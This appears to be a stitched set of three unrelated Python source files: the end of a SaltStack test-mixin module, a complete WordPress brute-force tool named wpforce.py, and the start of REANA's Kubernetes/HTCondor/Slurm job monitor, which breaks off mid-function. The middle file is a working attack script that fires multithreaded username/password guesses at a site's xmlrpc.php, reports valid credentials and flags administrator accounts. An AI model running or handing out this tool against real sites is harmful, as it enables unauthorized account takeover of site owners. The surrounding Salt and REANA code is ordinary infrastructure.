instance = super(_FixLoaderModuleMockMixinMroOrder, mcs).__new__(mcs, cls_name, tuple(bases), cls_dict)
# Apply our setUp function decorator
instance.setUp = LoaderModuleMockMixin.__setup_loader_modules_mocks__(instance.setUp)
return instance
class LoaderModuleMockMixin(six.with_metaclass(_FixLoaderModuleMockMixinMroOrder, object)):
'''
This class will setup salt loader dunders.
Please check `set_up_loader_mocks` above
'''
# Define our setUp function decorator
@staticmethod
def __setup_loader_modules_mocks__(setup_func):
@functools.wraps(setup_func)
def wrapper(self):
if NO_MOCK:
self.skipTest(NO_MOCK_REASON)
loader_modules_configs = self.setup_loader_modules()
if not isinstance(loader_modules_configs, dict):
raise RuntimeError(
'{}.setup_loader_modules() must return a dictionary where the keys are the '
'modules that require loader mocking setup and the values, the global module '
'variables for each of the module being mocked. For example \'__salt__\', '
'\'__opts__\', etc.'.format(self.__class__.__name__)
)
salt_dunders = (
'__opts__', '__salt__', '__runner__', '__context__', '__utils__',
'__ext_pillar__', '__thorium__', '__states__', '__serializers__', '__ret__',
'__grains__', '__pillar__', '__sdb__',
# Proxy is commented out on purpose since some code in salt expects a NameError
# and is most of the time not a required dunder
# '__proxy__'
)
for module, module_globals in six.iteritems(loader_modules_configs):
if not isinstance(module, types.ModuleType):
raise RuntimeError(
'The dictionary keys returned by {}.setup_loader_modules() '
'must be an imported module, not {}'.format(
self.__class__.__name__,
type(module)
)
)
if not isinstance(module_globals, dict):
raise RuntimeError(
'The dictionary values returned by {}.setup_loader_modules() '
'must be a dictionary, not {}'.format(
self.__class__.__name__,
type(module_globals)
)
)
module_blacklisted_dunders = module_globals.pop('blacklisted_dunders', ())
minion_funcs = {}
if '__salt__' in module_globals and module_globals['__salt__'] == 'autoload':
if '__opts__' not in module_globals:
raise RuntimeError(
'You must provide \'__opts__\' on the {} module globals dictionary '
'to auto load the minion functions'.format(module.__name__)
)
import salt.loader
ctx = {}
if '__utils__' not in module_globals:
utils = salt.loader.utils(module_globals['__opts__'],
context=module_globals.get('__context__') or ctx)
module_globals['__utils__'] = utils
minion_funcs = salt.loader.minion_mods(
module_globals['__opts__'],
context=module_globals.get('__context__') or ctx,
utils=module_globals.get('__utils__'),
)
module_globals['__salt__'] = minion_funcs
for dunder_name in salt_dunders:
if dunder_name not in module_globals:
if dunder_name in module_blacklisted_dunders:
continue
module_globals[dunder_name] = {}
sys_modules = module_globals.pop('sys.modules', None)
if sys_modules is not None:
if not isinstance(sys_modules, dict):
raise RuntimeError(
'\'sys.modules\' must be a dictionary not: {}'.format(
type(sys_modules)
)
)
patcher = patch.dict(sys.modules, sys_modules)
patcher.start()
def cleanup_sys_modules(patcher, sys_modules):
patcher.stop()
del patcher
del sys_modules
self.addCleanup(cleanup_sys_modules, patcher, sys_modules)
for key in module_globals:
if not hasattr(module, key):
if key in salt_dunders:
setattr(module, key, {})
else:
setattr(module, key, None)
if module_globals:
patcher = patch.multiple(module, **module_globals)
patcher.start()
def cleanup_module_globals(patcher, module_globals):
patcher.stop()
del patcher
del module_globals
self.addCleanup(cleanup_module_globals, patcher, module_globals)
if minion_funcs:
# Since we autoloaded the minion_funcs, let's namespace the functions with the globals
# used to patch above
import salt.utils
for func in minion_funcs:
minion_funcs[func] = salt.utils.functools.namespaced_function(
minion_funcs[func],
module_globals,
preserve_context=True
)
return setup_func(self)
return wrapper
def setup_loader_modules(self):
raise NotImplementedError(
'\'{}.setup_loader_modules()\' must be implemented'.format(self.__class__.__name__)
)
class XMLEqualityMixin(object):
def assertEqualXML(self, e1, e2):
if six.PY3 and isinstance(e1, bytes):
e1 = e1.decode('utf-8')
if six.PY3 and isinstance(e2, bytes):
e2 = e2.decode('utf-8')
if isinstance(e1, six.string_types):
e1 = etree.XML(e1)
if isinstance(e2, six.string_types):
e2 = etree.XML(e2)
if e1.tag != e2.tag:
return False
if e1.text != e2.text:
return False
if e1.tail != e2.tail:
return False
if e1.attrib != e2.attrib:
return False
if len(e1) != len(e2):
return False
return all(self.assertEqualXML(c1, c2) for c1, c2 in zip(e1, e2))
class SaltReturnAssertsMixin(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, six.string_types):
# If it's a string, make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
ret_data = []
for part in six.itervalues(ret):
keys = self.__return_valid_keys(keys)
okeys = keys[:]
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
ret_data.append(ret_item)
return ret_data
def assertSaltTrueReturn(self, ret):
try:
for saltret in self.__getWithinSaltReturn(ret, 'result'):
self.assertTrue(saltret)
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
for saltret in self.__getWithinSaltReturn(ret, 'result'):
self.assertFalse(saltret)
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
for saltret in self.__getWithinSaltReturn(ret, 'result'):
self.assertIsNone(saltret)
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'comment'):
self.assertIn(in_comment, saltret)
def assertNotInSaltComment(self, not_in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'comment'):
self.assertNotIn(not_in_comment, saltret)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltStateWarning(self, in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'warnings'):
self.assertIn(in_comment, saltret)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
for saltret in self.__getWithinSaltReturn(ret, 'warnings'):
self.assertNotIn(not_in_comment, saltret)
def assertInSaltReturn(self, item_to_check, ret, keys):
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertIn(item_to_check, saltret)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertNotIn(item_to_check, saltret)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertRegex(saltret, pattern)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertEqual(saltret, comparison)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
for saltret in self.__getWithinSaltReturn(ret, keys):
self.assertNotEqual(saltret, comparison)
def _fetch_events(q):
'''
Collect events and store them
'''
def _clean_queue():
print('Cleaning queue!')
while not q.empty():
queue_item = q.get()
queue_item.task_done()
atexit.register(_clean_queue)
a_config = AdaptedConfigurationTestCaseMixin()
event = salt.utils.event.get_event('minion', sock_dir=a_config.get_config('minion')['sock_dir'], opts=a_config.get_config('minion'))
while True:
try:
events = event.get_event(full=False)
except Exception:
# This is broad but we'll see all kinds of issues right now
# if we drop the proc out from under the socket while we're reading
pass
q.put(events)
class SaltMinionEventAssertsMixin(object):
'''
Asserts to verify that a given event was seen
'''
def __new__(cls, *args, **kwargs):
# We have to cross-call to re-gen a config
cls.q = multiprocessing.Queue()
cls.fetch_proc = salt.utils.process.SignalHandlingMultiprocessingProcess(
target=_fetch_events, args=(cls.q,)
)
cls.fetch_proc.start()
return object.__new__(cls)
def __exit__(self, *args, **kwargs):
self.fetch_proc.join()
def assertMinionEventFired(self, tag):
#TODO
raise salt.exceptions.NotImplemented('assertMinionEventFired() not implemented')
def assertMinionEventReceived(self, desired_event):
queue_wait = 5 # 2.5s
while self.q.empty():
time.sleep(0.5) # Wait for events to be pushed into the queue
queue_wait -= 1
if queue_wait <= 0:
raise AssertionError('Queue wait timer expired')
while not self.q.empty(): # This is not thread-safe and may be inaccurate
event = self.q.get()
if isinstance(event, dict):
event.pop('_stamp')
if desired_event == event:
self.fetch_proc.terminate()
return True
self.fetch_proc.terminate()
raise AssertionError('Event {0} was not received by minion'.format(desired_event))
|
wpforce.py
|
import re
import sys
import time
import socket
import urllib2
import argparse
import threading
from urlparse import urljoin
__author__ = 'n00py'
# These variables must be shared by all threads dynamically
correct_pairs = {}
total = 0
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
return False
has_colours = has_colours(sys.stdout)
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def printout(text, colour=WHITE):
if has_colours:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text)
def slice_list(input, size):
input_size = len(input)
slice_size = input_size / size
remain = input_size % size
result = []
iterator = iter(input)
for i in range(size):
result.append([])
for j in range(slice_size):
result[i].append(iterator.next())
if remain:
result[i].append(iterator.next())
remain -= 1
return result
def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
global total
global correct_pairs
for n in wordlist:
current_pass = wordlist.index(n)
for x in userlist:
current_user = userlist.index(x)
user = userlist[current_user]
password = wordlist[current_pass]
if user not in correct_pairs:
if user != "":
if password != "":
PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
total += 1
def BuildThreads(list_array,url,debug,userlist,verbose,agent):
if debug:
print "Here is the content of the wordlists for each thread"
for i in range(len(list_array)):
print "Thread " + str(i)
printout(str(list_array[i]), YELLOW)
print "\n-----------------------------------------------------"
threads = []
for i in range(len(list_array)):
t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
t.daemon = True
threads.append(t)
t.start()
def PrintBanner(input,wordlist,url,userlist,passlist):
banner = """\
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || | v.1.0.0
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
"""
print banner
print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
print ("URL: %s" % url)
def TestSite(url):
protocheck(url)
print "Trying: " + url
try:
urllib2.urlopen(url, timeout=3)
except urllib2.HTTPError, e:
if e.code == 405:
print url + " found!"
print "Now the brute force will begin! >:)"
if e.code == 404:
printout(str(e), YELLOW)
print " - XMLRPC has been moved, removed, or blocked"
sys.exit()
except urllib2.URLError, g:
printout("Could not identify XMLRPC. Please verify the domain.\n", YELLOW)
sys.exit()
except socket.timeout as e:
print type(e)
printout("The socket timed out, try it again.", YELLOW)
sys.exit()
def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
global passlist
if verbose is True or debug is True:
if debug is True:
thready = "[Thread " + str(thread_no) + "]"
printout(thready, YELLOW)
print "Trying " + user + " : " + password + "\n",
headers = {'User-Agent': agent,
'Connection': 'keep-alive',
'Accept': 'text/html'
}
post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
try:
req = urllib2.Request(url, post, headers)
response = urllib2.urlopen(req, timeout=3)
the_page = response.read()
look_for = "isAdmin"
try:
splitter = the_page.split(look_for, 1)[1]
correct_pairs[user] = password
print "--------------------------"
success = "[" + user + " : " + password + "] are valid credentials! "
adminAlert = ""
if splitter[23] == "1":
adminAlert = "- THIS ACCOUNT IS ADMIN"
printout(success, GREEN)
printout(adminAlert, RED)
print "\n--------------------------"
except:
pass
except urllib2.URLError, e:
if e.code == 404 or e.code == 403:
global total
printout(str(e), YELLOW)
print " - WAF or security plugin likely in use"
total = len(passlist)
sys.exit()
else:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
if args.verbose is True or args.debug is True:
print user + ":" + password + " was skipped"
except socket.timeout as e:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
if args.verbose is True or args.debug is True:
print user + ":" + password + " was skipped"
except socket.error as e:
printout(str(e), YELLOW)
print " - Got an RST, Probably tripped the firewall\n",
total = len(passlist)
sys.exit()
def protocheck(url):
url_pattern = re.compile("http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
if not url_pattern.match(url):
printout("Incorrect URL. Please include the protocol in the URL.\n", YELLOW)
sys.exit()
def main():
parser = argparse.ArgumentParser(description='This is a tool to brute force Worpress using the Wordpress API')
users = parser.add_mutually_exclusive_group(required=True)
users.add_argument('-i','--input', help='Input file name')
users.add_argument('-si' '--singleinput', help='Input list of users', action='store', dest='singleinput', nargs='+')
parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
parser.add_argument('-u','--url',help='URL of target', required=True)
parser.add_argument('-v','--verbose',help=' Verbose output. Show the attemps as they happen.', required=False, action='store_true')
parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
args = parser.parse_args()
url = args.url
url = urljoin(url, 'xmlrpc.php')
if args.input:
userlist = open(args.input, 'r').read().split('\n')
else:
printout("Remember to pass usernames in space delimited form!\n", YELLOW)
userlist = args.singleinput
totalusers = len(userlist)
passlist = open(args.wordlist, 'r').read().split('\n')
PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
TestSite(url)
list_array = slice_list(passlist, args.threads)
BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
time.sleep(0.1)
sys.stdout.flush()
percent = "%.0f%%" % (100 * (total)/len(passlist))
print " " + percent + " Percent Complete\r",
print "\nAll correct pairs:"
printout(str(correct_pairs), GREEN)
print ""
if __name__ == "__main__":
main()
|
job_monitor.py
|
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2019, 2020, 2021, 2022 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Job monitoring wrapper."""
import logging
import threading
import time
import traceback
from typing import Optional, Dict
from kubernetes import client, watch
from reana_commons.config import REANA_RUNTIME_KUBERNETES_NAMESPACE
from reana_commons.k8s.api_client import current_k8s_corev1_api_client
from reana_db.database import Session
from reana_db.models import Job, JobStatus
from reana_job_controller.config import COMPUTE_BACKENDS
from reana_job_controller.job_db import JOB_DB
from reana_job_controller.utils import SSHClient, singleton
class JobMonitor:
"""Job monitor interface."""
def __init__(self, thread_name: str, app=None):
"""Initialize REANA job monitors."""
self.job_event_reader_thread = threading.Thread(
name=thread_name, target=self.watch_jobs, args=(JOB_DB, app)
)
self.job_event_reader_thread.daemon = True
self.job_event_reader_thread.start()
self.job_db = JOB_DB
def watch_jobs(self, job_db, app):
"""Monitor running jobs."""
raise NotImplementedError
@singleton
class JobMonitorKubernetes(JobMonitor):
"""Kubernetes job monitor."""
def __init__(self, workflow_uuid: Optional[str] = None, **kwargs):
"""Initialize Kubernetes job monitor thread."""
self.job_manager_cls = COMPUTE_BACKENDS["kubernetes"]()
self.workflow_uuid = workflow_uuid
super(__class__, self).__init__(thread_name="kubernetes_job_monitor")
def _get_remaining_jobs(
self, compute_backend="kubernetes", statuses_to_skip=None
) -> Dict[str, str]:
"""Get remaining jobs according to a set of conditions.
:param compute_backend: For which compute backend to search remaining
jobs.
:param statuses_to_skip: List of statuses to skip when searching for
remaining jobs.
:type compute_backend: str
:type statuses_to_skip: list
:return: Dictionary composed of backend IDs as keys and REANA job IDs
as value.
:rtype: dict
"""
remaining_jobs = dict()
statuses_to_skip = statuses_to_skip or []
for job_id, job_dict in self.job_db.items():
is_remaining = (
not self.job_db[job_id]["deleted"]
and self.job_db[job_id]["compute_backend"] == compute_backend
and not self.job_db[job_id]["status"] in statuses_to_skip
)
if is_remaining:
remaining_jobs[job_dict["backend_job_id"]] = job_id
return remaining_jobs
def get_reana_job_id(self, backend_job_id: str) -> str:
"""Get REANA job ID."""
remaining_jobs = self._get_remaining_jobs()
return remaining_jobs[backend_job_id]
def get_backend_job_id(self, job_pod):
"""Get the backend job id for the backend object.
:param job_pod: Compute backend job object (Kubernetes V1Pod
https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/V1Pod.md)
:return: Backend job ID.
:rtype: str
"""
return job_pod.metadata.labels["job-name"]
def store_job_logs(self, reana_job_id, logs):
"""Store logs and update job status.
:param reana_job_id: Internal REANA job ID.
:param logs: Job logs.
:type reana_job_id: str
:type logs: str
"""
self.job_db[reana_job_id]["log"] = logs
store_logs(job_id=reana_job_id, logs=logs)
def update_job_status(self, reana_job_id, status):
"""Update job status inside RJC.
:param reana_job_id: Internal REANA job ID.
:param status: One of the possible status for jobs in REANA
:type reana_job_id: str
:type status: str
"""
self.job_db[reana_job_id]["status"] = status
def should_process_job(self, job_pod) -> bool:
"""Decide whether the job should be processed or not.
:param job_pod: Compute backend job object (Kubernetes V1Pod
https://github.com/kubernetes-client/python/blob/master/kubernetes/docs/V1Pod.md)
"""
remaining_jobs = self._get_remaining_jobs(
statuses_to_skip=[JobStatus.finished.name, JobStatus.failed.name]
)
backend_job_id = self.get_backend_job_id(job_pod)
is_job_in_remaining_jobs = backend_job_id in remaining_jobs
job_status = self.get_job_status(job_pod)
is_job_completed = job_status in [
JobStatus.finished.name,
JobStatus.failed.name,
]
return (
is_job_in_remaining_jobs
and is_job_completed
and self._all_job_containers_not_running(job_pod)
)
@staticmethod
def _get_job_container_statuses(job_pod):
return (job_pod.status.container_statuses or []) + (
job_pod.status.init_container_statuses or []
)
def _all_job_containers_not_running(self, job_pod) -> bool:
return all(
not container.state.running
for container in self._get_job_container_statuses(job_pod)
)
def clean_job(self, job_id):
"""Clean up the created Kubernetes Job.
:param job_id: Kubernetes job ID.
"""
try:
logging.info("Cleaning Kubernetes job {} ...".format(job_id))
self.job_manager_cls.stop(job_id)
self.job_db[self.get_reana_job_id(job_id)]["deleted"] = True
except client.rest.ApiException as e:
logging.error("Error while connecting to Kubernetes API: {}".format(e))
except Exception as e:
logging.error(traceback.format_exc())
logging.error("Unexpected error: {}".format(e))
def get_job_status(self, job_pod) -> Optional[str]:
"""Get Kubernetes based REANA job status."""
status = None
backend_job_id = self.get_backend_job_id(job_pod)
if job_pod.status.phase == "Succeeded":
logging.info("Kubernetes job id: {} succeeded.".format(backend_job_id))
status = JobStatus.finished.name
elif job_pod.status.phase == "Failed":
logging.info("Kubernetes job id: {} failed.".format(backend_job_id))
status = JobStatus.failed.name
elif job_pod.status.phase == "Pending":
container_statuses = self._get_job_container_statuses(job_pod)
try:
for container in container_statuses:
reason = container.state.waiting.reason
if "ErrImagePull" in reason:
logging.info(
"Container {} in Kubernetes job {} "
"failed to fetch image.".format(
container.name, backend_job_id
)
)
status = JobStatus.failed.name
elif "InvalidImageName" in reason:
logging.info(
"Container {} in Kubernetes job {} "
"failed due to invalid image name.".format(
container.name, backend_job_id
)
)
status = JobStatus.failed.name
except (AttributeError, TypeError):
pass
return status
def _get_containers_logs(self, job_pod) -> Optional[str]:
try:
pod_logs = ""
container_statuses = self._get_job_container_statuses(job_pod)
logging.info(f"Grabbing pod {job_pod.metadata.name} logs ...")
for container in container_statuses:
if container.state.terminated:
container_log = current_k8s_corev1_api_client.read_namespaced_pod_log(
namespace=REANA_RUNTIME_KUBERNETES_NAMESPACE,
name=job_pod.metadata.name,
container=container.name,
)
pod_logs += "{}: :\n {}\n".format(container.name, container_log)
if hasattr(container.state.terminated, "reason"):
pod_logs += "\n{}\n".format(container.state.terminated.reason)
elif container.state.waiting:
pod_logs += "Container {} failed, error: {}".format(
container.name, container.state.waiting.message
)
return pod_logs
except client.rest.ApiException as e:
logging.error("Error while connecting to Kubernetes API: {}".format(e))
return None
except Exception as e:
logging.error(traceback.format_exc())
logging.error("Unexpected error: {}".format(e))
return None
def get_job_logs(self, job_pod) -> Optional[str]:
"""Get job logs."""
logs = self._get_containers_logs(job_pod)
if job_pod.status.reason == "DeadlineExceeded":
if not logs:
logs = ""
backend_job_id = self.get_backend_job_id(job_pod)
message = f"\n{job_pod.status.reason}\nThe job was killed due to exceeding timeout"
try:
specified_timeout = job_pod.spec.active_deadline_seconds
message += f" of {specified_timeout} seconds."
except AttributeError:
message += "."
logging.error(
f"Kubernetes job id: {backend_job_id}. Could not get job timeout from Job spec."
)
logs += message
logging.info(
f"Kubernetes job id: {backend_job_id} was killed due to timeout."
)
return logs
def watch_jobs(self, job_db, app=None):
"""Open stream connection to k8s apiserver to watch all jobs status.
:param job_db: Dictionary which contains all current jobs.
"""
while True:
logging.debug("Starting a new stream request to watch Jobs")
try:
w = watch.Watch()
for event in w.stream(
current_k8s_corev1_api_client.list_namespaced_pod,
namespace=REANA_RUNTIME_KUBERNETES_NAMESPACE,
label_selector=f"reana-run-job-workflow-uuid={self.workflow_uuid}",
):
logging.info("New Pod event received: {0}".format(event["type"]))
job_pod = event["object"]
if self.should_process_job(job_pod):
job_status = self.get_job_status(job_pod)
backend_job_id = self.get_backend_job_id(job_pod)
reana_job_id = self.get_reana_job_id(backend_job_id)
logs = self.get_job_logs(job_pod)
self.store_job_logs(reana_job_id, logs)
self.update_job_status(reana_job_id, job_status)
if JobStatus.should_cleanup_job(job_status):
self.clean_job(backend_job_id)
except client.rest.ApiException as e:
logging.error("Error while connecting to Kubernetes API: {}".format(e))
except Exception as e:
logging.error(traceback.format_exc())
logging.error("Unexpected error: {}".format(e))
condorJobStatus = {
"Unexpanded": 0,
"Idle": 1,
"Running": 2,
"Removed": 3,
"Completed": 4,
"Held": 5,
"Submission_Error": 6,
}
@singleton
class JobMonitorHTCondorCERN(JobMonitor):
"""HTCondor jobs monitor CERN."""
def __init__(self, app=None, **kwargs):
"""Initialize HTCondor job monitor thread."""
self.job_manager_cls = COMPUTE_BACKENDS["htcondorcern"]()
super(__class__, self).__init__(thread_name="htcondor_job_monitor", app=app)
def format_condor_job_que_query(self, backend_job_ids):
"""Format HTCondor job que query."""
base_query = "ClusterId == {} ||"
query = ""
for job_id in backend_job_ids:
query += base_query.format(job_id)
return query[:-2]
def watch_jobs(self, job_db, app):
"""Watch currently running HTCondor jobs.
:param job_db: Dictionary which contains all current jobs.
"""
ignore_hold_codes = [35, 16]
statuses_to_skip = ["finished", "failed"]
while True:
try:
logging.info("Starting a new stream request to watch Condor Jobs")
backend_job_ids = [
job_dict["backend_job_id"]
for id, job_dict in job_db.items()
if not job_db[id]["deleted"]
and job_db[id]["compute_backend"] == "htcondorcern"
]
future_condor_jobs = app.htcondor_executor.submit(
query_condor_jobs, app, backend_job_ids
)
condor_jobs = future_condor_jobs.result()
for job_id, job_dict in job_db.items():
if (
job_db[job_id]["deleted"]
or job_db[job_id]["compute_backend"] != "htcondorcern"
or job_db[job_id]["status"] in statuses_to_skip
):
continue
try:
condor_job = next(
job
for job in condor_jobs
if job["ClusterId"] == job_dict["backend_job_id"]
)
except Exception:
msg = "Job with id {} was not found in schedd.".format(
job_dict["backend_job_id"]
)
logging.error(msg)
future_job_history = app.htcondor_executor.submit(
self.job_manager_cls.find_job_in_history,
job_dict["backend_job_id"],
)
condor_job = future_job_history.result()
if condor_job:
msg = "Job was found in history. {}".format(str(condor_job))
logging.error(msg)
job_db[job_id]["status"] = "failed"
job_db[job_id]["log"] = msg
continue
if condor_job["JobStatus"] == condorJobStatus["Completed"]:
exit_code = condor_job.get(
"ExitCode", condor_job.get("ExitStatus")
)
if exit_code == 0:
job_db[job_id]["status"] = "finished"
else:
logging.info(
"Job job_id: {0}, condor_job_id: {1} "
"failed".format(job_id, condor_job["ClusterId"])
)
job_db[job_id]["status"] = "failed"
app.htcondor_executor.submit(
self.job_manager_cls.spool_output,
job_dict["backend_job_id"],
).result()
job_logs = app.htcondor_executor.submit(
self.job_manager_cls.get_logs,
job_dict["backend_job_id"],
job_db[job_id]["obj"].workflow_workspace,
)
job_db[job_id]["log"] = job_logs.result()
store_logs(logs=job_db[job_id]["log"], job_id=job_id)
job_db[job_id]["deleted"] = True
elif (
condor_job["JobStatus"] == condorJobStatus["Held"]
and int(condor_job["HoldReasonCode"]) not in ignore_hold_codes
):
logging.info("Job was held, will delete and set as failed")
self.job_manager_cls.stop(condor_job["ClusterId"])
job_db[job_id]["deleted"] = True
time.sleep(120)
except Exception as e:
logging.error("Unexpected error: {}".format(e), exc_info=True)
time.sleep(120)
slurmJobStatus = {
"failed": [
"BOOT_FAIL",
"CANCELLED",
"DEADLINE",
"FAILED",
"NODE_FAIL",
"OUT_OF_MEMORY",
"PREEMPTED",
"TIMEOUT",
"SUSPENDED",
"STOPPED",
],
"finished": ["COMPLETED"],
"running": ["CONFIGURING", "COMPLETING", "RUNNING", "STAGE_OUT"],
"idle": [
"PENDING",
"REQUEUE_FED",
"REQUEUE_HOLD",
"RESV_DEL_HOLD",
"REQUEUED",
"RESIZING",
]
# 'REVOKED',
# 'SIGNALING',
# 'SPECIAL_EXIT',
}
@singleton
class JobMonitorSlurmCERN(JobMonitor):
"""Slurm jobs monitor CERN."""
def __init__(self, **kwargs):
"""Initialize Slurm job monitor thread."""
self.job_manager_cls = COMPUTE_BACKENDS["slurmcern"]()
super(__class__, self).__init__(thread_name="slurm_job_monitor")
def watch_jobs(self, job_db, app=None):
"""Use SSH connection to slurm submitnode to monitor jobs.
:param job_db: Dictionary which contains all running jobs.
"""
slurm_connection = SSHClient(
hostname=self.job_manager_cls.SLURM_HEADNODE_HOSTNAME,
port=self.job_manager_cls.SLURM_HEADNODE_PORT,
)
statuses_to_skip = ["finished", "failed"]
while True:
logging.debug("Starting a new stream request to watch Jobs")
try:
slurm_jobs = {}
for id, job_dict in job_db.items():
if (
not job_db[id]["deleted"]
and job_db[id]["compute_backend"] == "slurmcern"
and not job_db[id]["status"] in statuses_to_skip
):
slurm_jobs[job_dict["backend_job_id"]] = id
if not slurm_jobs.keys():
continue
for slurm_job_id, job_dict in slurm_jobs.items():
slurm_job_status = slurm_connection.exec_command(
f"scontrol show job {slurm_job_id} -o | tr ' ' '\n' | grep JobState | cut -f2 -d '='"
).rstrip()
job_id = slurm_jobs[slurm_job_id]
if slurm_job_status in slurmJobStatus["finished"]:
self.job_manager_cls.get_outputs()
job_db[job_id]["status"] = "finished"
job_db[job_id]["deleted"] = True
job_db[job_id]["log"] = self.job_manager_cls.get_logs(
backend_job_id=slurm_job_id,
workspace=job_db[job_id]["obj"].workflow_workspace,
)
store_logs(logs=job_db[job_id]["log"], job_id=job_id)
if slurm_job_status in slurmJobStatus["failed"]:
self.job_manager_cls.get_outputs()
job_db[job_id]["status"] = "failed"
job_db[job_id]["deleted"] = True
job_db[job_id]["log"] = self.job_manager_cls.get_logs(
backend_job_id=slurm_job_id,
workspace=job_db[job_id]["obj"].workflow_workspace,
)
store_logs(logs=job_db[job_id]["log"], job_id=job_id)
except Exception as e:
logging.error("Unexpected error: {}".format(e), exc_info=True)
time.sleep(120)
def store_logs(logs, job_id):
"""Write logs to DB."""
try:
logging.info("Storing job logs: {}".format(job_id))
Session.query(Job).filter_by(id_=job_id).update(dict(logs=logs))
Session.commit()
except Exception as e:
logging.error("Exception while saving logs: {}".format(str(e)), exc_info=True)
def format_condor_job_que_query(backend_job_ids):
"""Format HTCondor job que query."""
base_query = "ClusterId == {} ||"
query = ""
for job_id in backend_job_ids:
query += base_query.format(job_id)
return query[:-2]
def query_condor_jobs(app, backend_job_ids):
"""Query condor jobs."""
ads = ["ClusterId", "JobStatus", "ExitCode", "ExitStatus", "HoldReasonCode"]
query = format_condor_job_que_query(backend_job_ids)
htcondorcern_job_manager_cls = COMPUTE_BACKENDS["htcondorcern"]()
schedd = htcondorcern_job_manager_cls._get_schedd()
